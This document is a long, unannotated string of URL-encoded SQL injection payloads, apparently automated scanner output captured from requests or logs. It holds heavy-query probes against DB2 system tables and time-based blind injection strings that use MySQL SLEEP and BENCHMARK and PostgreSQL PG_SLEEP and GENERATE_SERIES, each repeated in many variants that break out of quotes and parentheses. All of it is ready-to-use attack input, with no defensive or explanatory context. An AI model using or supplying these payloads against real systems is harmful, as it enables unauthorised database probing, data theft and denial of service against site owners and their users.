1234.5%25%27%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27%25%27%3D%27 1234.5%00%27%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%28%27AKhe%27%3D%27AKhe 1234.5%00%27%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20AND%20%27kDpP%27%3D%27kDpP 1234.5%27%29%20WHERE%208699%3D8699%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 1234.5%22%29%20WHERE%208289%3D8289%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 1234.5%29%20WHERE%204448%3D4448%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 1234.5%27%20WHERE%206509%3D6509%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 1234.5%22%20WHERE%207331%3D7331%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 1234.5%20WHERE%204468%3D4468%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20--%20 1234.5%27%7C%7C%28SELECT%20%27rNer%27%20FROM%20DUAL%20WHERE%208177%3D8177%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%7C%7C%27 1234.5%27%7C%7C%28SELECT%20%27lCuy%27%20WHERE%202202%3D2202%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%7C%7C%27 1234.5%27%2B%28SELECT%20agJZ%20WHERE%206463%3D6463%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%2B%27 1234.5%27%2B%28SELECT%20%27GvuJ%27%20WHERE%202563%3D2563%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%29%2B%27 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%207231%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29%20%23 1234.5%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%22%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%29%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%29%29%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%29%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%29%29%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%29%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%29%29%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%22%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%22%29%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%22%29%29%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%22%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%22%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%22%29%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%22%29%29%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%22%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%25%27%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%25%27%29%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%25%27%29%29%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%25%27%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%00%27%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%00%27%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%29%20WHERE%205566%3D5566%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%22%29%20WHERE%207160%3D7160%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%29%20WHERE%205885%3D5885%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%20WHERE%209092%3D9092%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%22%20WHERE%203314%3D3314%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%20WHERE%209922%3D9922%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%7C%7C%28SELECT%20%27nCCk%27%20FROM%20DUAL%20WHERE%207029%3D7029%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%7C%7C%28SELECT%20%27uQnu%27%20WHERE%208634%3D8634%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%2B%28SELECT%20qLPp%20WHERE%208774%3D8774%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%2B%28SELECT%20%27TeCi%27%20WHERE%207747%3D7747%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- 1234.5%27%20IN%20BOOLEAN%20MODE%29%20AND%204859%3D%28SELECT%20COUNT%28%2A%29%20FROM%20SYSIBM.SYSTABLES%20AS%20T1%2CSYSIBM.SYSTABLES%20AS%20T2%2CSYSIBM.SYSTABLES%20AS%20T3%29-- -6419%29%20OR%205330%3DSLEEP%285%29 -8334%27%29%20OR%205330%3DSLEEP%285%29 -9269%27%20OR%205330%3DSLEEP%285%29 -9337%22%20OR%205330%3DSLEEP%285%29 -8368%29%20OR%205330%3DSLEEP%285%29%20AND%20%284185%3D4185 -3063%29%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%284721%3D4721 -4886%29%29%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%28%283925%3D3925 -2235%20OR%205330%3DSLEEP%285%29 -2114%27%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%27tppZ%27%3D%27tppZ -8799%27%29%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%28%27PEGF%27%3D%27PEGF -9425%27%29%29%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%28%28%27glCx%27%3D%27glCx -2485%27%20OR%205330%3DSLEEP%285%29%20AND%20%27gfmm%27%3D%27gfmm -6632%27%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%27JZDB%27%20LIKE%20%27JZDB -6904%27%29%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%28%27rWuR%27%20LIKE%20%27rWuR -2525%27%29%29%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%28%28%27clxo%27%20LIKE%20%27clxo -3592%27%20OR%205330%3DSLEEP%285%29%20AND%20%27KDIu%27%20LIKE%20%27KDIu -7407%22%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%22FFJL%22%3D%22FFJL -4995%22%29%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%28%22CAjG%22%3D%22CAjG -7823%22%29%29%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%28%28%22enhI%22%3D%22enhI -3618%22%20OR%205330%3DSLEEP%285%29%20AND%20%22ESep%22%3D%22ESep -9322%22%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%22cWKU%22%20LIKE%20%22cWKU -9080%22%29%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%28%22IjoI%22%20LIKE%20%22IjoI -7238%22%29%29%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%28%28%22XBCx%22%20LIKE%20%22XBCx -2769%22%20OR%205330%3DSLEEP%285%29%20AND%20%22jhZN%22%20LIKE%20%22jhZN -4807%25%27%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%27%25%27%3D%27 -7385%25%27%29%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%28%27%25%27%3D%27 -7760%25%27%29%29%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%28%28%27%25%27%3D%27 -8322%25%27%20OR%205330%3DSLEEP%285%29%20AND%20%27%25%27%3D%27 -7690%00%27%29%20OR%205330%3DSLEEP%285%29%20AND%20%28%27heOG%27%3D%27heOG -8634%00%27%20OR%205330%3DSLEEP%285%29%20AND%20%27vOOf%27%3D%27vOOf -1185%27%29%20WHERE%208287%3D8287%20OR%205330%3DSLEEP%285%29%20--%20 -9276%22%29%20WHERE%209615%3D9615%20OR%205330%3DSLEEP%285%29%20--%20 -8434%29%20WHERE%202174%3D2174%20OR%205330%3DSLEEP%285%29%20--%20 -4756%27%20WHERE%209482%3D9482%20OR%205330%3DSLEEP%285%29%20--%20 -5770%22%20WHERE%204349%3D4349%20OR%205330%3DSLEEP%285%29%20--%20 -6213%20WHERE%206481%3D6481%20OR%205330%3DSLEEP%285%29%20--%20 -3586%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29 -9295%27%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29 -2970%27%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29 -7840%22%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29 -4272%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%283847%3D3847 -6288%29%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%284195%3D4195 -9367%29%29%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%28%282330%3D2330 -9699%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29 -7941%27%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%27Duau%27%3D%27Duau -2420%27%29%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%28%27yqef%27%3D%27yqef -3408%27%29%29%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%28%28%27jPoz%27%3D%27jPoz -4552%27%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%27SNzw%27%3D%27SNzw -8394%27%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%27nYhJ%27%20LIKE%20%27nYhJ -6881%27%29%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%28%27YMMb%27%20LIKE%20%27YMMb -2257%27%29%29%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%28%28%27mQbI%27%20LIKE%20%27mQbI -2700%27%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%27OYZo%27%20LIKE%20%27OYZo -2421%22%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%22uJMr%22%3D%22uJMr -7574%22%29%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%28%22Eazv%22%3D%22Eazv -2914%22%29%29%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%28%28%22Dwqq%22%3D%22Dwqq -1971%22%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%22EXKy%22%3D%22EXKy -9955%22%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%22UUut%22%20LIKE%20%22UUut -3631%22%29%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%28%22HQhD%22%20LIKE%20%22HQhD -1544%22%29%29%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%28%28%22EoXX%22%20LIKE%20%22EoXX -7066%22%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%22rBQF%22%20LIKE%20%22rBQF -5792%25%27%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%27%25%27%3D%27 -3735%25%27%29%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%28%27%25%27%3D%27 -4987%25%27%29%29%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%28%28%27%25%27%3D%27 -9113%25%27%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%27%25%27%3D%27 -1058%00%27%29%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%28%27gZXb%27%3D%27gZXb -3472%00%27%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20AND%20%27ZyvT%27%3D%27ZyvT -2354%27%29%20WHERE%203814%3D3814%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20--%20 -4707%22%29%20WHERE%208787%3D8787%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20--%20 -6345%29%20WHERE%202072%3D2072%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20--%20 -4472%27%20WHERE%206433%3D6433%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20--%20 -9497%22%20WHERE%201193%3D1193%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20--%20 -7185%20WHERE%201281%3D1281%20OR%209565%3DBENCHMARK%285000000%2CMD5%280x4c44676c%29%29%20--%20 -5225%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29 -8729%27%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29 -2989%27%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29 -6408%22%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29 -9229%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%284938%3D4938 -3951%29%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%287492%3D7492 -8542%29%29%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%284664%3D4664 -4168%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29 -7315%27%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27Cava%27%3D%27Cava -9248%27%29%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27rkYH%27%3D%27rkYH -3902%27%29%29%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27KvxS%27%3D%27KvxS -7627%27%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%27bnHd%27%3D%27bnHd -8998%27%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27qsaF%27%20LIKE%20%27qsaF -3149%27%29%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27miEH%27%20LIKE%20%27miEH -7932%27%29%29%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27Midm%27%20LIKE%20%27Midm -2281%27%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%27apsN%27%20LIKE%20%27apsN -8567%22%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22tnXF%22%3D%22tnXF -5021%22%29%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22KDsP%22%3D%22KDsP -4769%22%29%29%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22lMOI%22%3D%22lMOI -3646%22%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%22qTnU%22%3D%22qTnU -5747%22%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%22DJsg%22%20LIKE%20%22DJsg -8793%22%29%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%22wbBz%22%20LIKE%20%22wbBz -1121%22%29%29%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%22lkln%22%20LIKE%20%22lkln -1265%22%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%22dEIS%22%20LIKE%20%22dEIS -9380%25%27%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27%25%27%3D%27 -2019%25%27%29%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%27%25%27%3D%27 -7196%25%27%29%29%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%28%28%27%25%27%3D%27 -5121%25%27%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%27%25%27%3D%27 -5658%00%27%29%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%28%27Lwsm%27%3D%27Lwsm -1694%00%27%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20AND%20%27kEPV%27%3D%27kEPV -4283%27%29%20WHERE%206147%3D6147%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20--%20 -6721%22%29%20WHERE%208478%3D8478%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20--%20 -7039%29%20WHERE%206825%3D6825%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20--%20 -9965%27%20WHERE%205913%3D5913%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20--%20 -2254%22%20WHERE%206623%3D6623%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20--%20 -6232%20WHERE%207040%3D7040%20OR%201947%3D%28SELECT%201947%20FROM%20PG_SLEEP%285%29%29%20--%20 -7033%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -8048%27%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -6076%27%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -6234%22%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -1849%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%281242%3D1242 -4765%29%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%288275%3D8275 -6637%29%29%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%283574%3D3574 -2405%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29 -7350%27%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27atSi%27%3D%27atSi -1128%27%29%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27RphK%27%3D%27RphK -8996%27%29%29%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%28%27AgcL%27%3D%27AgcL -7684%27%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%27hRkC%27%3D%27hRkC -3002%27%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%27kAWC%27%20LIKE%20%27kAWC -9980%27%29%29%20OR%203250%3D%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20AND%20%28%28%27GiaD%27%20LIKE%20%27GiaD 